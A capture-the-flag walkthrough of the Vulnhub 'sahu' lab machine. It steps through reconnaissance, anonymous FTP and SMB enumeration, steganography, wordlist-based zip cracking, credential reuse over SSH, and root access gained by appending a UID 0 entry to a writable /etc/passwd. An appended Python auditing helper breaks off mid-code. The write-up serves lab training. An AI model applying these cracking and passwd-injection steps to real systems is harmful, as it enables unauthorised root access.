Vulnhub: Detailed Walkthrough of the Sahu Machine

Sahu

Author: jason_huawen

Basic Machine Information

Name: sahu: 1.1

URL:

https://www.vulnhub.com/entry/sahu-11,421/

Identifying the Target Host's IP Address

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ sudo netdiscover -i eth1

Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:e1:77:fc      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.225  08:00:27:97:60:a8      1      60  PCS Systemtechnik GmbH     

Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.225.

Nmap Scan

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.225 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 03:09 EST
Nmap scan report for basecode.samsara.com (192.168.56.225)
Host is up (0.00024s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
|   256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_  256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open  netbios-ssn Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)
MAC Address: 08:00:27:97:60:A8 (Oracle VirtualBox virtual NIC)
Service Info: Host: SAHU-VIRTUALBOX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SAHU-VIRTUALBOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-12-15T08:09:43
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.10.7-Ubuntu)
|   Computer name: sahu-virtualbox
|   NetBIOS computer name: SAHU-VIRTUALBOX\x00
|   Domain name: \x00
|   FQDN: sahu-virtualbox
|_  System time: 2022-12-15T13:39:44+05:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds

Getting a Shell

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ftp 192.168.56.225                          
Connected to 192.168.56.225.
220 (vsFTPd 3.0.3)
Name (192.168.56.225:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||55526|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51511|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        133          4096 Jan 30  2020 .
drwxr-xr-x    2 0        133          4096 Jan 30  2020 ..
-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
226 Directory send OK.
ftp> get ftp.zip
local: ftp.zip remote: ftp.zip
229 Entering Extended Passive Mode (|||47112|)
150 Opening BINARY mode data connection for ftp.zip (230 bytes).
100% |********************************************************************************|   230      198.94 KiB/s    00:00 ETA
226 Transfer complete.
230 bytes received in 00:00 (167.36 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
ftp.zip  nmap_full_scan

We obtained the file ftp.zip. An attempt to crack it with john failed, so cracking this file is set aside for now.

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient -L 192.168.56.225        
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      Samba on Ubuntu
        IPC$            IPC       IPC Service (sahu-VirtualBox server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        SAHU                 SAHU-VIRTUALBOX
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED

From the output above, the SMB share requires username and password authentication.

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ dirb http://192.168.56.225

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Dec 15 03:24:57 2022
URL_BASE: http://192.168.56.225/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.225/ ----
==> DIRECTORY: http://192.168.56.225/H/                                                                                      
+ http://192.168.56.225/index.php (CODE:200|SIZE:194)                                                                        
+ http://192.168.56.225/server-status (CODE:403|SIZE:279)                                                                    
                                                                                                                             
---- Entering directory: http://192.168.56.225/H/ ----
==> DIRECTORY: http://192.168.56.225/H/A/                                                                                    
                                                                                                                             
---- Entering directory: http://192.168.56.225/H/A/ ----
==> DIRECTORY: http://192.168.56.225/H/A/R/                                                                                  
                                                                                                                             
---- Entering directory: http://192.168.56.225/H/A/R/ ----
                                                                                                                             
-----------------
END_TIME: Thu Dec 15 03:25:04 2022
DOWNLOADED: 18448 - FOUND: 2
                              

Scanning one directory level after another:

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.225/H/A/R/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 03:26:25 Starting gobuster in directory enumeration mode
===============================================================
/Y                    (Status: 301) [Size: 318] [--> http://192.168.56.225/H/A/R/Y/]
Progress: 13677 / 220561 (6.20%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:27 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.225/H/A/R/Y/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 03:26:36 Starting gobuster in directory enumeration mode
===============================================================
/A                    (Status: 301) [Size: 320] [--> http://192.168.56.225/H/A/R/Y/A/]
Progress: 3290 / 220561 (1.49%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:37 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.225/H/A/R/Y/A/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 03:26:44 Starting gobuster in directory enumeration mode
===============================================================
/N                    (Status: 301) [Size: 322] [--> http://192.168.56.225/H/A/R/Y/A/N/]
Progress: 3094 / 220561 (1.40%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:44 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/N/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.225/H/A/R/Y/A/N/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 03:26:52 Starting gobuster in directory enumeration mode
===============================================================
/A                    (Status: 301) [Size: 324] [--> http://192.168.56.225/H/A/R/Y/A/N/A/]
Progress: 3254 / 220561 (1.48%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:52 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/N/A/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.225/H/A/R/Y/A/N/A/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/15 03:26:59 Starting gobuster in directory enumeration mode
===============================================================
Progress: 112562 / 220561 (51.03%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:27:18 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ curl http://192.168.56.225/H/A/R/Y/A/N/A/  
<!DOCTYPE html>
<html>
<head>
<style>
body {background-color: black;}
h1   {color: blue;}
p    {color: red;}
</style>
</head>
<body>

<h1>About Haryana</h1>
<p>

The name of Haryana instantly conjures up the image of a State which astonishingly combines both-antiquity and plenty. The Vedic land of Haryana has been a cradle of Indian culture and civilization. Indian traditions regard this region as the matrix of creation of northern altar’ where Brahma performed the pristine sacrifice and created the universe. This theory of creation has been confirmed to a large extent by archaeological investigations carried out by Guy E. Pilgrim in 1915, who has established that 15 million years ago, early man lived in the Haryana Shivaliks. The Vamana Purana states that King Kuru ploughed the field of Kurukshetra with a golden ploughshare drawn by the Nandi of Lord Shiva and reclaimed an area of seven Kosas. 

Replete with myths, legends and vedic references, Haryana’s past is steeped in glory. It was on this soil that saint Ved Vyas wrote Mahabharata. It was here, 5,000 long years ago that Lord Krishna preached the gospel of duty to Arjuna at the on set of the great battle of Mahabharata:”Your right is to do your duty and not to bother about the fruits (Outcome) thereof !” Since then, this philosophy of the supremacy of duty has become a beacon to succeeding generations.

The Mahabharata knows Haryana as the land of plentiful grains (Bahudhanyaka) and immense riches (Bahudhana). Before the Mahabharata war, a battle of ten kings took place in the Kurukshetra region. But it was the Mahabharata fought for the highest values of righteousness which gave to the region world-wide fame because of the profound and sophisticated thought expounded in the holy Bhagavadgita by Lord Krishna recited to the quivering Arjuna. 

The region has been the scene of many a war because of its being ‘A Gateway to North India’. As years rolled by, successive streams of the Huns, the Turks and the Tughlaqs invaded India and decisive battles were fought on this land. At the end of the 14 century, Tamur led an army through this area to Delhi. Later, the Mughals defeated the Lodhis in the historic battle of Panipat in the year 1526. Another decisive battle was fought in the year 1556 at this very site, establishing the supremacy of the Mughals for centuries to come. Towards the middle of the 18th century, the Marathas had established their sway over Haryana. The intrusion of Ahmed Shah Durrani into India, culminating Maratha ascendancy and the rapid decline of the Mughal empire, leading ultimately to the advent of the British rule.

Indeed, the history of Haryana is the saga of the struggle of a virile, righteous, forthright and proud people. From ancient times, the people of Haryana have borne the main brunt of invaders and foreign hordes with their known traits if bravery and valour. They have survived many an upheaval, upholding the traditional glory and greatness of the land to this day. The epoch-making events of yore, the martyrdom in the First War of Indian Independence in 1857, the great sacrifices in the freedom struggle, and the display of outstanding valour, unflinching courage, and heroism in recent years are all in keeping with the character of this land of action. Bold in spirit and action, the people of Haryana have formed a bulwark against forces of aggression and anti-nationalism.

Haryana has always remained a rendezvous for diverse races, cultures and faiths. It is on this soil that they met, fused and crystallized into something truly Indian. Hindu Saints and Sikh Gurus have traversed the land of Haryana spreading their message of universal love and brotherhood. Sihi in Faridabad, the birth place of great Hindi poet Surdas, is another nucleus of culture in Haryana while the legend of Lord Krishna is very evident in the lives of the people. The love for cattle and the abundance of milk in the diet of Haryanavis persists to this day which gave to the region world-wide fame.

Haryana emerged as a separate State in the federal galaxy of the Indian Republic on November 1,1966. With just 1.37% of the total geographical area and less than 2% of India’s population, Haryana has carved a place of distinction for itself during the past three decades. Whether it is agriculture or industry, canal irrigation or rural electrification, Haryana has marched towards modernity with leaps and bounds. Today, it enjoys the unique distinction in India of having provided electricity, metaled roads and potable drinking water to all its villages within record time. Haryana is among the most prosperous states in India, having one of the highest per-capita income.
.</p> #try to extract with hurrry
 
</body>
</html>

#try to extract with hurrry

Let's see whether this is the password for the FTP archive or for the image:

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ unzip ftp.zip                         
Archive:  ftp.zip
[ftp.zip] ftp.txt password: 
password incorrect--reenter:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
ftp_hash  ftp.zip  Haryana-1-1.jpg  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ steghide extract -sf Haryana-1-1.jpg 
Enter passphrase: 
wrote extracted data to "file.txt".
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
file.txt  ftp_hash  ftp.zip  Haryana-1-1.jpg  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat file.txt                             

      I have found the password for a zip file but i have forgote the last part of it, can you find out
     
       5AHU**             

After some trial and error, hurrry turned out to be the passphrase for the image.

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@, > dict.txt
Crunch will now generate the following amount of data: 4732 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 676 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@% >> dict.txt
Crunch will now generate the following amount of data: 1820 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@^ >> dict.txt
Crunch will now generate the following amount of data: 6006 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 858 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU,% >> dict.txt
Crunch will now generate the following amount of data: 1820 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU%^ >> dict.txt
Crunch will now generate the following amount of data: 2310 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU^@ >> dict.txt
Crunch will now generate the following amount of data: 6006 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 858 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU^% >> dict.txt
Crunch will now generate the following amount of data: 2310 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ wc -l dict.txt 
3572 dict.txt

Generate a dictionary to crack the encrypted FTP archive.
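To see what the seven crunch masks above actually cover, here is an added Python example (not from the original post) that computes each mask's candidate count and byte size the way crunch reports them, the combined total, and which two-character class combinations the dictionary never included. The symbol-class size of 33 is inferred from the post's own output (858 lines for 5AHU@^ = 26 x 33); the other class sizes are the ASCII classes crunch uses.

```python
"""Keyspace estimate for crunch -t mask patterns (added example, not from the post).

crunch -t placeholders: @ lowercase, , uppercase, % digits, ^ symbols.
"""
from itertools import product

# Class sizes: 26 lowercase, 26 uppercase, 10 digits; 33 symbols is
# inferred from the post's output (858 = 26 * 33 for the mask 5AHU@^).
CLASS_SIZE = {"@": 26, ",": 26, "%": 10, "^": 33}

# The seven masks the post actually ran (list constructed from the post).
POST_MASKS = ["5AHU@,", "5AHU@%", "5AHU@^", "5AHU,%", "5AHU%^", "5AHU^@", "5AHU^%"]


def mask_size(mask):
    """Number of candidates crunch emits for one -t mask."""
    n = 1
    for ch in mask:
        n *= CLASS_SIZE.get(ch, 1)  # literal characters contribute a factor of 1
    return n


def mask_bytes(mask):
    """Bytes crunch reports: every candidate is the password plus a newline."""
    return mask_size(mask) * (len(mask) + 1)


def total_candidates(masks):
    """Size of the combined dictionary (what `wc -l dict.txt` shows)."""
    return sum(mask_size(m) for m in masks)


def full_keyspace(unknown):
    """All completions of `unknown` positions drawn from the four classes."""
    return sum(CLASS_SIZE.values()) ** unknown


def missing_masks(prefix, unknown, masks):
    """Class combinations for the unknown positions that the masks never covered."""
    covered = {m[len(prefix):] for m in masks}
    combos = ("".join(p) for p in product(CLASS_SIZE, repeat=unknown))
    return sorted(c for c in combos if c not in covered)


if __name__ == "__main__":
    for m in POST_MASKS:
        print(f"{m}: {mask_size(m):4d} lines, {mask_bytes(m):5d} bytes")
    total = total_candidates(POST_MASKS)
    space = full_keyspace(2)
    print(f"dictionary: {total} of {space} possible completions ({100 * total / space:.1f}%)")
    print("masks not generated:", " ".join(missing_masks("5AHU", 2, POST_MASKS)))
```

The seven masks total 3572 of the 9025 possible two-character completions, so the dictionary covered under 40% of the space; the recovered password 5AHU#5 happens to fall in the ^% mask, which was one of those generated.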

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ fcrackzip -D dict.txt ftp.zip 
found id 55484135, 'dict.txt' is not a zipfile ver 2.xx, skipping
aaaaaa: No such file or directory
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ fcrackzip -u -D -p dict.txt ftp.zip 


PASSWORD FOUND!!!!: pw == 5AHU#5
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ unzip ftp.zip                      
Archive:  ftp.zip
[ftp.zip] ftp.txt password: 
  inflating: ftp.txt                 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat ftp.txt                     

      USERNAME = sahu
      PASSWORD = sahu14216     

We now have a username and password, but are these credentials for FTP, SMB, or SSH?

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ssh sahu@192.168.56.225                                        
The authenticity of host '192.168.56.225 (192.168.56.225)' can't be established.
ED25519 key fingerprint is SHA256:Dnpn2cxW8+u0nsoKPgcVy0e8NudUGIvt5N8XAz25uUQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.225' (ED25519) to the list of known hosts.
sahu@192.168.56.225's password: 
Permission denied, please try again.
sahu@192.168.56.225's password: 

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare -U sahu
Password for [WORKGROUP\sahu]:
Try "help" to get a list of possible commands.
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls 
  .                                   D        0  Thu Jan 30 03:50:23 2020
  ..                                  D        0  Thu Jan 30 02:57:06 2020
  ssh.txt                             N       64  Thu Jan 30 03:50:02 2020

                10253588 blocks of size 1024. 4423460 blocks available
smb: \> get ssh.txt 
getting file \ssh.txt of size 64 as ssh.txt (31.2 KiloBytes/sec) (average 31.2 KiloBytes/sec)
smb: \> quit
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat ssh.txt  
   ssh users list
   USERNAME = haryana
   PASSWORD = hralltime
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ 

We now have the SSH username and password.

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ssh haryana@192.168.56.225                   
haryana@192.168.56.225's password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-18-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


156 updates can be installed immediately.
77 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings

Last login: Tue Feb  4 18:05:07 2020 from 192.168.43.111
haryana@sahu-VirtualBox:~$ id
uid=1001(haryana) gid=1001(haryana) groups=1001(haryana)
haryana@sahu-VirtualBox:~$ sudo -l
[sudo] password for haryana: 
Sorry, user haryana may not run sudo on sahu-VirtualBox.
haryana@sahu-VirtualBox:~$ 

Privilege Escalation

Upload the linpeas.sh script to the target's /tmp directory, make it executable, and run it:

Among its output it reports:


╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d                                    
                                                                                                                              
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable                                                             
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No                                                                                  
═╣ Can I read shadow plists? ............ No                                                                                  
═╣ Can I write shadow plists? ........... No                                                                                  
═╣ Can I read opasswd file? ............. No                                                                                  
═╣ Can I write in network-scripts? ...... No                                                                                  
═╣ Can I read root folder? .............. No     

Since /etc/passwd is writable, we can add a user entry with UID 0 and a password hash of our choosing, which yields root:

┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41

Edit /etc/passwd directly on the target with nano and append an entry for the user jason:

haryana@sahu-VirtualBox:/tmp$ nano /etc/passwd
haryana@sahu-VirtualBox:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:114::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:108:115:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:110:116:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
kernoops:x:114:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:116:122::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:117:123:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:124::/nonexistent:/bin/false
colord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:120:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:121:126::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:122:127:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:123:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:124:129:Gnome Display Manager:/var/lib/gdm3:/bin/false
sahu:x:1000:1000:sahu,,,:/home/sahu:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:125:133:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
haryana:x:1001:1001:,,,:/home/haryana:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:127:134:Light Display Manager:/var/lib/lightdm:/bin/false
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash

Then switch to the user jason:

haryana@sahu-VirtualBox:/tmp$ su - jason
Password: 
root@sahu-VirtualBox:~# cd /root
root@sahu-VirtualBox:~# ls -alh
total 32K
drwx------  4 root root 4.0K Jan 30  2020 .
drwxr-xr-x 20 root root 4.0K Jan 29  2020 ..
-rw-------  1 root root 1.5K Feb  4  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 28  2019 .bashrc
drwx------  2 root root 4.0K Oct 17  2019 .cache
drwxr-xr-x  3 root root 4.0K Jan 30  2020 .local
-rw-r--r--  1 root root  148 Aug 28  2019 .profile
-rw-r--r--  1 root root  123 Jan 30  2020 root.txt
root@sahu-VirtualBox:~# cat root.txt
   GREATE YOU FINISH THIS TASK
                               CONGRATS!!!!!!!!!!!!
     TELL ME ON TWITTER  @VivekGautam09
root@sahu-VirtualBox:~# 
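The escalation above relies on three conditions a defender can check for: a passwd file writable by non-root users, a password hash stored directly in the second field instead of the `x` that points to /etc/shadow, and a second UID 0 account. Here is an added Python audit (not from the original post or from linpeas) that reports all three; the sample passwd content is constructed from a few lines of the listing above, with the real hash replaced by a placeholder.

```python
"""Audit /etc/passwd for the weaknesses used in this walkthrough (added example, not from the post)."""
import os
import stat
from dataclasses import dataclass

# Constructed sample: lines taken from the post's listing plus the injected
# entry; the hash is a placeholder, not the value from the post.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sahu:x:1000:1000:sahu,,,:/home/sahu:/bin/bash
haryana:x:1001:1001:,,,:/home/haryana:/bin/bash
jason:$6$jason$CONSTRUCTED_PLACEHOLDER_HASH:0:0:root:/root:/bin/bash
"""

# Values that legitimately appear in the password field when hashes live in /etc/shadow.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
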